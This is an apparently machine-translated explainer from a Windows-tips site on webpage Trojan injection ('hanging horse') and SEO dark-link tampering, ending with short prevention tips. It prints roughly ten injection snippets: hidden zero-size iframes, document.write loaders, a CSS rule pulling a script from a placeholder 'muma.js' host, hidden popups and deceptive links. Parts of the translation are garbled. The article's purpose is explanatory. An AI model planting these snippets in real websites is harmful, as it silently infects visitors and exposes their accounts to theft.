Webpage hanging horse and dark chain detection

  
                  

What is a webpage? A webpage is a malicious attacker who, after attacking a WEB website, embeds a piece of code or script in a webpage to automatically download a Trojan with a specific purpose, while a malicious attacker implements malicious code or scripts. The behavior of implantation is often referred to as “hanging horse”.

What is SEO Dark Chain SEO Dark Chain is a fairly common means of SEO black hat tactics. Generally speaking, it means that some people use the abnormal means to obtain the rights of other websites, modify the source code of their websites, and add the backlink code pointing to their own websites. The goal is to optimize the ranking of some of the keywords in your site in search engines, or to increase the search engine weight of your site. Dark Chain Example:

Recently, many homepages using the ECSHOP open source program (multiple versions) have been tampered with and inserted into the malicious code of the seo dark chain. Most users who use ecshop want to optimize the “ugg” keyword, please check it yourself. Check method:

Open the website home page, right click on the website source code, and search for “ugg”.


Web page linked to the horse harm For the site itself, the harm pages linked to horse there are three: 1, becoming the Trojan & ldquo; & rdquo ;, puppet allies affect the site's reputation and public image 2, economic loss; 3, system resources loss is huge; for the client, sensitive information stolen, such as bank accounts, game accounts used for entertainment and other social accounts, seriously affecting the work and life of the users of the planted client; In addition, it may be used as a source of attack against other victims, giving the real attacker a black pot.

The principle of webpage hanging horse The basic principle of webpage hanging horse is to exploit operating system vulnerabilities and browser vulnerabilities (all kinds of browsers with IE as the core are the most likely to be attacked, which is determined by market share) Vulnerabilities in browser-related plugins (such as Flash, adobe acrobat, etc., are very common). These vulnerabilities can often cause buffer overflows and privilege escalation, and exploits can be exploited to execute arbitrary code set by the attacker.

Common hanging horse types Frame hanging horse, js file hanging horse, js deformation encryption, body hanging horse, hidden hanging horse, css hanging horse, JAVA hanging horse, picture camouflage, camouflage call, advanced deception, etc. .

Hanging horse example: 1, frame hanging horse <iframe src=address width=0 height=0></iframe>

2, js file hanging horse First of all the following code document .write("<iframe width='0' height='0' src='Address'></iframe>");

Save as xxx.js, then JS hangs The code is

<script language=javascript src=xxx.js></script>

3, js morph encryption <SCRIPT language="JScript.Encode" src=http ://://。 。 。 。 Hanging horse top.document.body.innerHTML = top.document.body.innerHTML '\ \ <iframe src="http://www.xxx.com/muma.htm/"></iframe> ;';

6. Hanging horses in css body { background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js> ;</script>")')}

7, javascript hanging horse

<SCRIPT language=javascript> window.open ("address","" ,"toolb Ar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,high=1"); </script>

8, image camouflage

<html> <iframe src="Web Horse Address" height=0 width=0></iframe> <img src="Image Address"></Center> </html>

9, camouflage call <frameset rows="444,0" cols="*"> <frame src="open page" framborder= "no" scrolling="auto" noresize marginwidth="0" margingheight="0"> <frame src="net address" frameborder="no" scrolling="no" noresize Marginwidth="0"margingheight="0"> </frameset>

10, advanced deception <a href="http://www.xxx.com (confusing connection address, Show this address to the Trojan address)" > The content to be displayed on the page</a> <SCRIPT Language="JavaScript"> function www_163_com () { var url="net horse address"; open( Url, "NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10 , top=10"); }

How to prevent webpages from hanging horses Prevention of webpages is recommended to develop the following good habits: 1. It is best not to browse websites with low credibility; 2. Download online resources It is best to download to a more reliable resource website; 3. Update the anti-virus software virus database frequently; 4. Patch the system and application software.

Copyright © Windows knowledge All Rights Reserved